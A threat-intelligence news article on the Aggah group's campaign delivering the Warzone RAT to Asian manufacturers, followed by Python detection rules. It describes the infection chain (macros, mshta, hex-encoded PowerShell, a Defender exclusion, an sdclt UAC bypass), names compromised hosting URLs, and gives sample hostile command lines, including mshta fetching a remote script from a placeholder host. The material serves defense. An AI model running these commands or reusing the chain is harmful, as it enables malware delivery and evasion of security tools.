The Pakistan-linked threat group’s campaign uses compromised WordPress sites to deliver the Warzone RAT to manufacturing companies in Taiwan and South Korea.
Threat actors are using compromised WordPress websites to target manufacturers across Asia with a new spear-phishing campaign that delivers the Warzone RAT, a commodity infostealer available widely for purchase on criminal forums, researchers have found.
The threat group Aggah, believed to be affiliated with Pakistan and first identified in March 2019, is delivering the RAT in a campaign aimed at spreading malware to manufacturing companies in Taiwan and South Korea, according to new research from threat detection and response security firm Anomali.
The campaign, which began in early July, uses spoofed email addresses appearing to originate with legitimate customers of the manufacturers, signaling that it was the work of Aggah, researchers noted.
“Spoofed business-to-business (B2B) email addresses against the targeted industry is activity consistent with Aggah,” Tara Gould and Rory Gould from Anomali Threat Research wrote in a report on the campaign published Thursday.
Researchers from Palo Alto Networks’ Unit 42 first discovered Aggah in March 2019 in a campaign targeting entities in the United Arab Emirates; it was later identified as a global phishing campaign designed to deliver RevengeRAT, researchers said.
The group, which typically aims to steal data from targets, was first thought to be associated with Gorgon Group: a Pakistani group known for targeting Western governments. This association has not been proven, but researchers tend to agree that the Urdu-speaking group originated in Pakistan, according to Anomali.
Among the targets of Aggah’s latest campaign were Fon-star International Technology, a Taiwan-based manufacturing company; FomoTech, a Taiwanese engineering company; and Hyundai Electric, a Korean power company.
Threat actors often target global manufacturers and other suppliers not only for their own sake, but also as a way to infiltrate some of their more high-profile customers. An example of this was seen in April, when the now-defunct REvil gang successfully deployed ransomware against Quanta, a Taiwanese supplier of Apple Computer, just ahead of a major Apple product launch event.
REvil stole files from Quanta that included blueprints for some of Apple’s new products. The operators threatened to release more and to spill the beans on new products in order to pressure the company to pay up ahead of Apple’s Spring Loaded event.
The latest Aggah spear-phishing campaign begins with a custom email masquerading as “FoodHub.co.uk,” an online food delivery service based in the United Kingdom, researchers said.
The email body includes order and shipping information as well as an attached PowerPoint file named “Purchase order 4500061977,pdf.ppam” that contains obfuscated macros that use mshta.exe to execute JavaScript from a known compromised website, mail.hoteloscar.in/images/5[.]html, researchers explained.
“Hoteloscar.in is the legitimate website for a hotel in India that has been compromised to host malicious scripts,” they said. “Throughout this campaign, we observed legitimate websites being used to host the malicious scripts, most of which appeared to be WordPress sites, indicating the group may have exploited a WordPress vulnerability.”
The JavaScript uses anti-debugging techniques, such as a setInterval timing check that detects a debugger from the script’s execution time and sends setInterval into an infinite loop if one is found, researchers noted. After the debugging checks, the script returned http://dlsc.af/wp-admin/buy/5[.]html, another compromised website, belonging to a food distributor based in Afghanistan.
Eventually, the JavaScript uses PowerShell to load hex-encoded payloads, with the ultimate payload being the Warzone RAT, a C++-based malware available for purchase on the dark web, researchers said.
“Warzone is a commodity malware, with cracked versions hosted on GitHub,” they wrote. “The RAT reuses code from the Ave Maria stealer.” Capabilities of the Warzone RAT include privilege escalation, keylogging, a remote shell, downloading and executing files, a file manager, and persistence on the network, researchers noted.
“To bypass User Account Control (UAC), the Windows Defender path was added to a PowerShell command to exclude it,” they explained. “Privilege escalation in Warzone was carried out using sdclt.exe, a Windows backup utility in Windows 10.”
The Anomali team noted a number of tactics used in the campaign that are evidence of Aggah’s handiwork. These include the use of malicious documents and malicious PowerPoint files containing macros; obfuscated payloads in a PowerShell file, typically hex-encoded; use of scripts embedded in websites; themes of order and payment information; and the aforementioned use of spoofed B2B email addresses within the target industry.
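As an added example (not from the article or from Anomali’s report), the Python below sketches process-creation detections for the chain described above, run over constructed sample events: an Office parent launching mshta.exe with a remote script, mshta.exe spawning PowerShell, hex-blob PowerShell command lines, a Defender exclusion being added, and sdclt.exe launched from an unusual parent. The Add-MpPreference cmdlet and the placeholder domain are assumptions; the article only says the Defender path was added to a PowerShell command to exclude it.

```python
import re

# Constructed process-creation events modelled on the chain the article describes.
# These are sample records written for this example, not telemetry from the campaign;
# the domain is a placeholder, not one of the compromised sites named in the report.
EVENTS = [
    {"parent": "POWERPNT.EXE", "image": "mshta.exe",
     "cmdline": "mshta.exe http://compromised-site.example/images/5.html"},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop $b='" + "4d5a90" * 30 + "'"},
    {"parent": "explorer.exe", "image": "powershell.exe",   # cmdlet is an assumption
     "cmdline": "powershell.exe Add-MpPreference -ExclusionPath C:\\Users\\Public"},
    {"parent": "powershell.exe", "image": "sdclt.exe", "cmdline": "sdclt.exe"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
REMOTE_URL = re.compile(r"https?://", re.I)
LONG_HEX = re.compile(r"(?:[0-9a-f]{2}){64,}", re.I)      # 128+ contiguous hex chars
DEFENDER_EXCL = re.compile(r"add-mppreference.*-exclusionpath", re.I)


def classify(ev):
    """Return the names of the rules that fire for one process-creation event."""
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
    hits = []
    # Macro-bearing Office document handing a remote .html to mshta.exe
    if image == "mshta.exe" and parent in OFFICE_PARENTS and REMOTE_URL.search(cmd):
        hits.append("office_spawns_mshta_remote_script")
    # mshta-hosted script moving on to PowerShell
    if image == "powershell.exe" and parent == "mshta.exe":
        hits.append("mshta_spawns_powershell")
    # Hex-encoded payload staged through the PowerShell command line
    if image == "powershell.exe" and LONG_HEX.search(cmd):
        hits.append("powershell_hex_encoded_payload")
    # Defender exclusion added from PowerShell
    if image == "powershell.exe" and DEFENDER_EXCL.search(cmd):
        hits.append("defender_exclusion_added")
    # sdclt.exe is normally user-launched via explorer.exe; a script parent is a heuristic flag
    if image == "sdclt.exe" and parent != "explorer.exe":
        hits.append("sdclt_unusual_parent")
    return hits


def triage(events):
    """Map event index -> fired rules, dropping events that fire nothing."""
    results = {i: classify(ev) for i, ev in enumerate(events)}
    return {i: hits for i, hits in results.items() if hits}
```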